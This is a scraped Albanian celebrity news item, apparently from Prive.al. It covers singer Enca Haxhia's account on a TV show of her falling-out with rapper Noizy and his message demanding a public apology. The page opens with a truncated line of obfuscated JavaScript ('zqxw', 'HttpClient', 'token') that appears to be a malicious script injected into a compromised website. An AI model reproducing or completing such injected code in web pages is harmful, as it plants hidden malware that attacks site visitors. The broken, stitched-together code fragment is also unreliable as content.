;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Enca tregon çfarë i shkroi Noizy në mesazhe: Mendova se e kisha shok por… (VIDEO)

By

Mbrëmë në Nd’rrimin e Natës, këngëtarja e famshme shqiptare Enca Haxhia, për herë të parë dhe të fundit siç ka thënë ajo, ka sqaruar çfarë ka ndodhur në mes saj dhe Reperit Noizy.

Ish miku i saj dhe njëri nga bashkëpunëtorët më të ngushtë të këngëtares, i ka shkruar edhe mesazhe nëse mund t’i quajmë kërcënuese këngëtares.

Për të parën herë në NIN Enca ka folur për mosmarrëveshjet në mes tyre, duke e sqaruar situatën e madje duke treguar edhe se çfarë i ka shkruar reperi asaj.

“Është një temë që nuk e kam prekur në intervista e në rrjetet sociale sepse nuk dua t’i fryej skandalet. Pjesa që më ka prekur më shumë është se kisha një lidhje shoqërore me atë artist dhe kisha respekt për sukseset që kemi ndërtuar bashkë. Unë nuk jam përjashtuar nga OTR, sepse askush s’mund të ma marri vendin tim. Kemi pasur suksese të mëdha bashkë dhe jam krenare për ato suksese. Por në momentin që mua një person më disrespekton dhe më hedh poshtë për asgjë, nuk vlen. Më erdhi një mesazh nga ai që më thoshte më kërko falje publikisht ose do shkruaj diçka në instagram”.

“Ishte momenti kur e kuptova që jo që kisha humbur një shok, por e kuptova që s’kisha pasur kurrë një shok”.

“Më bëhet qejfi që vazhdon të më përcjellë me po të njëjtin admirim që më ka përcjellë gjithmonë”, ka deklaruar Enca në NIN. /Prive.al

 

Artikuj të ngjashëm